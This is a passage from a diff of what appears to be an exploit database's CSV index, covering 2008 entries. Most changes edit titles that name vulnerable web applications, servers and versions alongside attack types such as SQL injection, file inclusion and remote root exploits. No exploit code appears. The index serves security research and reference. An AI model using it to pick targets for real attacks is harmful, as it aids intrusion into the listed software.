Injection",2008-03-17,S@BUN,php,webapps,0 +5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 - Multiple Remote File Inclusion Vulnerabilities",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 +5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win)",2008-03-17,"Georgi Guninski",multiple,dos,0 5269,platforms/windows/remote/5269.txt,"mg-soft net inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service Exploit",2008-03-17,0in,windows,dos,0 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) SQL Injection",2008-03-18,fataku,php,webapps,0 -5274,platforms/asp/webapps/5274.txt,"KAPhotoservice (album.asp) Remote SQL Injection Exploit",2008-03-18,JosS,asp,webapps,0 -5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - (id) Remote SQL Injection",2008-03-18,n3w7u,php,webapps,0 -5276,platforms/asp/webapps/5276.txt,"ASPapp (links.asp CatId) Remote SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 +5274,platforms/asp/webapps/5274.txt,"KAPhotoservice (album.asp) SQL Injection Exploit",2008-03-18,JosS,asp,webapps,0 +5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - (id) SQL Injection",2008-03-18,n3w7u,php,webapps,0 +5276,platforms/asp/webapps/5276.txt,"ASPapp (links.asp CatId) SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 5277,platforms/php/webapps/5277.txt,"Joomla Component joovideo 1.2.2 - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5278,platforms/php/webapps/5278.txt,"Joomla Component Alberghi <= 2.1.3 - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5278,platforms/php/webapps/5278.txt,"Joomla Component Alberghi 2.1.3 - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 5280,platforms/php/webapps/5280.txt,"Joomla Component Restaurante 1.0 - (id) SQL Injection",2008-03-19,S@BUN,php,webapps,0 5281,platforms/php/webapps/5281.php,"PEEL CMS Admin Hash Extraction and Remote Upload Exploit",2008-03-19,"Charles Fol",php,webapps,0 -5282,platforms/solaris/remote/5282.txt,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 -5283,platforms/linux/remote/5283.txt,"CenterIM <= 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 -5285,platforms/php/webapps/5285.txt,"RunCMS Module section (artid) Remote SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 -5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base Remote SQL Injection",2008-03-20,xcorpitx,php,webapps,0 +5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 +5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 +5285,platforms/php/webapps/5285.txt,"RunCMS Module section (artid) SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 +5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base SQL Injection",2008-03-20,xcorpitx,php,webapps,0 5287,platforms/windows/local/5287.txt,"Microsoft Office Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion Vulnerabilities",2008-03-21,0x90,php,webapps,0 5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 -5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - (cid) Remote SQL Injection",2008-03-21,S@BUN,php,webapps,0 -5291,platforms/php/webapps/5291.txt,"D.E. Classifieds (cat_id) Remote SQL Injection",2008-03-21,S@BUN,php,webapps,0 -5292,platforms/php/webapps/5292.py,"PostNuke <= 0.764 - Blind SQL Injection Exploit",2008-03-21,The:Paradox,php,webapps,0 -5293,platforms/php/webapps/5293.pl,"XLPortal <= 2.2.4 - (search) Remote SQL Injection Exploit",2008-03-21,cOndemned,php,webapps,0 +5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - (cid) SQL Injection",2008-03-21,S@BUN,php,webapps,0 +5291,platforms/php/webapps/5291.txt,"D.E. Classifieds (cat_id) SQL Injection",2008-03-21,S@BUN,php,webapps,0 +5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection Exploit",2008-03-21,The:Paradox,php,webapps,0 +5293,platforms/php/webapps/5293.pl,"XLPortal 2.2.4 - (search) SQL Injection Exploit",2008-03-21,cOndemned,php,webapps,0 5294,platforms/php/webapps/5294.txt,"joomla components custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps,0 5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - (dynamic_titles.php) SQL Injection Exploit",2008-03-22,Inphex,php,webapps,0 5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - (login.php) Local File Inclusion",2008-03-22,KnocKout,php,webapps,0 5297,platforms/php/webapps/5297.txt,"Joomla Component rekry 1.0.0 - (op_id) SQL Injection",2008-03-23,Sniper456,php,webapps,0 5298,platforms/php/webapps/5298.py,"destar 0.2.2-5 - Arbitrary Add New User Exploit",2008-03-23,nonroot,php,webapps,0 -5299,platforms/php/webapps/5299.txt,"Joomla Component d3000 1.0.0 - Remote SQL Injection",2008-03-23,S@BUN,php,webapps,0 -5300,platforms/php/webapps/5300.txt,"Joomla Component Cinema 1.0 - Remote SQL Injection",2008-03-23,S@BUN,php,webapps,0 +5299,platforms/php/webapps/5299.txt,"Joomla Component d3000 1.0.0 - SQL Injection",2008-03-23,S@BUN,php,webapps,0 +5300,platforms/php/webapps/5300.txt,"Joomla Component Cinema 1.0 - SQL Injection",2008-03-23,S@BUN,php,webapps,0 5301,platforms/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion",2008-03-24,bd0rk,php,webapps,0 5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 - (index.php page) Local File Inclusion",2008-03-24,DSecRG,php,webapps,0 5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusion Vulnerabilities",2008-03-24,DSecRG,php,webapps,0 5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop (his-webshop.pl t) Remote File Disclosure",2008-03-24,"Zero X",cgi,webapps,0 5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 - Arbitrary Add Admin User Exploit",2008-03-24,nonroot,php,webapps,0 -5306,platforms/multiple/dos/5306.txt,"snircd <= 1.3.4 - (send_user_mode) Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 +5306,platforms/multiple/dos/5306.txt,"snircd 1.3.4 - (send_user_mode) Denial of Service",2008-03-24,"Chris Porter",multiple,dos,0 5307,platforms/linux/dos/5307.pl,"MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC",2008-03-25,"Guido Landi",linux,dos,0 5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",php,webapps,0 5309,platforms/php/webapps/5309.txt,"BolinOS 4.6.1 - (LFI/XSS) Multiple Security Vulnerabilities",2008-03-25,DSecRG,php,webapps,0 -5310,platforms/php/webapps/5310.txt,"Joomla Component alphacontent <= 2.5.8 - (id) SQL Injection",2008-03-25,cO2,php,webapps,0 -5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection",2008-03-25,girex,php,webapps,0 +5310,platforms/php/webapps/5310.txt,"Joomla Component alphacontent 2.5.8 - (id) SQL Injection",2008-03-25,cO2,php,webapps,0 +5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - SQL Injection",2008-03-25,girex,php,webapps,0 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - (mod.php) Local File Inclusion",2008-03-25,girex,php,webapps,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow Exploit",2008-03-26,muts,windows,remote,69 @@ -4957,75 +4957,75 @@ id,file,description,date,author,platform,type,port 5321,platforms/windows/dos/5321.txt,"Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS",2008-03-30,Marsu,windows,dos,0 5322,platforms/php/webapps/5322.txt,"Smoothflash (admin_view_image.php cid) SQL Injection",2008-03-30,S@BUN,php,webapps,0 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit",2008-03-30,bd0rk,php,webapps,0 -5324,platforms/php/webapps/5324.txt,"KISGB <= (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,php,webapps,0 +5324,platforms/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,php,webapps,0 5325,platforms/php/webapps/5325.txt,"JShop 1.x - 2.x (page.php xPage) Local File Inclusion",2008-03-30,v0l4arrra,php,webapps,0 5326,platforms/php/webapps/5326.txt,"WordPress Plugin Download - (dl_id) SQL Injection",2008-03-31,BL4CK,php,webapps,0 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection",2008-03-31,anonymous,php,webapps,0 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (Win32)",2008-03-31,Heretic2,windows,remote,80 -5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - (articleId) Remote SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 +5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - (articleId) SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 5332,platforms/windows/remote/5332.html,"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0 -5333,platforms/php/webapps/5333.txt,"EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit",2008-04-01,"Khashayar Fereidani",php,webapps,0 +5333,platforms/php/webapps/5333.txt,"EasyNews 40tr (SQL/XSS/LFI) SQL Injection Exploit",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 -5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop <= 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 -5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 Password Retrieve Remote SQL Injection Exploit",2008-04-01,girex,php,webapps,0 +5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 +5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 Password Retrieve SQL Injection Exploit",2008-04-01,girex,php,webapps,0 5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 - (id) SQL Injection",2008-04-01,Stack,php,webapps,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite Exploit",2008-04-01,shinnai,windows,remote,0 -5339,platforms/php/webapps/5339.php,"Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 -5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection",2008-04-01,DreamTurk,php,webapps,0 +5339,platforms/php/webapps/5339.php,"Nuked-Klan 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 +5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0 5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0 -5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 - RFI",2008-04-02,NoGe,php,webapps,0 +5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0 5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow PoC",2008-04-03,shinnai,windows,dos,0 -5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie (id_gal) Remote SQL Injection",2008-04-03,S@BUN,php,webapps,0 -5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives (id) Remote SQL Injection",2008-04-03,S@BUN,php,webapps,0 -5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - Remote SQL Injection",2008-04-03,Houssamix,php,webapps,0 +5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie (id_gal) SQL Injection",2008-04-03,S@BUN,php,webapps,0 +5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives (id) SQL Injection",2008-04-03,S@BUN,php,webapps,0 +5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection",2008-04-03,Houssamix,php,webapps,0 5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto (C_ID) SQL Injection",2008-04-03,Stack,php,webapps,0 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String PoC",2008-04-03,bratax,windows,dos,0 5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - (pkgadd) Local Root Exploit",2008-04-04,qaaz,sco,local,0 5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA - Local Root Exploit",2008-04-04,qaaz,sco,local,0 5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - mcd Local Root Exploit",2008-04-04,qaaz,sco,local,0 -5358,platforms/php/webapps/5358.pl,"XPOZE Pro <= 3.05 - (reed) Remote SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 +5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone (cat_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 DSR File Local BoF Exploit",2008-04-04,shinnai,windows,local,0 -5362,platforms/php/webapps/5362.txt,"Comdev News Publisher Remote SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0 +5362,platforms/php/webapps/5362.txt,"Comdev News Publisher SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - (incl_page) Remote File Inclusion",2008-04-04,JIKO,php,webapps,0 -5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (Metasploit)",2008-04-04,I)ruid,solaris,remote,0 -5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 - (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 -5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) Remote SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 +5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit (Metasploit)",2008-04-04,I)ruid,solaris,remote,0 +5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 +5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0 5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 Change User Password",2008-04-05,"Virangar Security",php,webapps,0 -5371,platforms/php/webapps/5371.txt,"Entertainment Directory <= 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5372,platforms/php/webapps/5372.txt,"Easynet Forum Host (forum.php forum) SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-04-05,U238,asp,webapps,0 -5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - (cat_id) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple SQL Injection Vulnerabilities",2008-04-05,U238,asp,webapps,0 +5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - (cat_id) SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0 5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection Exploit",2008-04-05,t0pP8uZz,php,webapps,0 -5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - (cat_id) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - (cid) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - Remote SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0 +5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - (cat_id) SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - (cid) SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0 5380,platforms/php/webapps/5380.txt,"Blog PixelMotion (sauvBase.php) Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0 5381,platforms/php/webapps/5381.txt,"Blog PixelMotion (modif_config.php) Remote File Upload",2008-04-06,JIKO,php,webapps,0 5382,platforms/php/webapps/5382.txt,"Blog PixelMotion (index.php categorie) SQL Injection",2008-04-06,parad0x,php,webapps,0 -5383,platforms/php/webapps/5383.txt,"Site Sift Listings (id) Remote SQL Injection",2008-04-06,S@BUN,php,webapps,0 +5383,platforms/php/webapps/5383.txt,"Site Sift Listings (id) SQL Injection",2008-04-06,S@BUN,php,webapps,0 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0 5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service (forum.php forum) SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow Exploit",2008-04-06,"INetCop Security",linux,remote,80 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0 -5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - (id) Remote SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 -5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers (project) Remote SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 -5391,platforms/php/webapps/5391.php,"Drake CMS <= 0.4.11 - Remote Blind SQL Injection Exploit",2008-04-07,EgiX,php,webapps,0 -5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 +5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - (id) SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 +5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers (project) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Remote Blind SQL Injection Exploit",2008-04-07,EgiX,php,webapps,0 +5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 @@ -5033,76 +5033,76 @@ id,file,description,date,author,platform,type,port 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 -5400,platforms/php/webapps/5400.txt,"724CMS <= 4.01 Enterprise (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 -5401,platforms/php/webapps/5401.txt,"My Gaming Ladder <= 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 -5402,platforms/php/webapps/5402.txt,"iScripts SocialWare (id) Remote SQL Injection Vulnerbility",2008-04-07,t0pP8uZz,php,webapps,0 -5404,platforms/php/webapps/5404.php,"phpTournois <= G4 - Remote File Upload/Code Execution Exploit",2008-04-08,"Charles Fol",php,webapps,0 -5405,platforms/php/webapps/5405.txt,"exbb <= 0.22 - (LFI/RFI) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 -5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) Remote SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 -5407,platforms/php/webapps/5407.php,"FLABER <= 1.1 RC1 - Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 -5408,platforms/php/webapps/5408.pl,"LokiCMS <= 0.3.3 - Remote Command Execution Exploit",2008-04-08,girex,php,webapps,0 -5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - Remote SQL Injection Vulnerabilities",2008-04-08,U238,asp,webapps,0 -5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) Remote SQL Injection",2008-04-08,0in,php,webapps,0 -5411,platforms/php/webapps/5411.txt,"Koobi Pro 6.25 links Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5412,platforms/php/webapps/5412.txt,"Koobi Pro 6.25 shop Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5413,platforms/php/webapps/5413.txt,"Koobi Pro 6.25 gallery Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 +5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5402,platforms/php/webapps/5402.txt,"iScripts SocialWare (id) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5404,platforms/php/webapps/5404.php,"phpTournois G4 - Remote File Upload/Code Execution Exploit",2008-04-08,"Charles Fol",php,webapps,0 +5405,platforms/php/webapps/5405.txt,"exbb 0.22 - (LFI/RFI) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 +5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 +5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 +5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution Exploit",2008-04-08,girex,php,webapps,0 +5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection Vulnerabilities",2008-04-08,U238,asp,webapps,0 +5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) SQL Injection",2008-04-08,0in,php,webapps,0 +5411,platforms/php/webapps/5411.txt,"Koobi Pro 6.25 links SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5412,platforms/php/webapps/5412.txt,"Koobi Pro 6.25 shop SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5413,platforms/php/webapps/5413.txt,"Koobi Pro 6.25 gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection Vulnerabilities",2008-04-09,"Virangar Security",php,webapps,0 -5422,platforms/php/webapps/5422.pl,"LiveCart <= 1.1.1 - (category id) Blind SQL Injection Exploit",2008-04-10,irvian,php,webapps,0 +5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection Exploit",2008-04-10,irvian,php,webapps,0 5423,platforms/php/webapps/5423.txt,"Ksemail (index.php language) Local File Inclusion",2008-04-10,dun,php,webapps,0 5424,platforms/linux/local/5424.txt,"Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit",2008-04-10,"Albert Sellares",linux,local,0 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 -5426,platforms/php/webapps/5426.txt,"RX Maxsoft (popup_img.php fotoID) Remote SQL 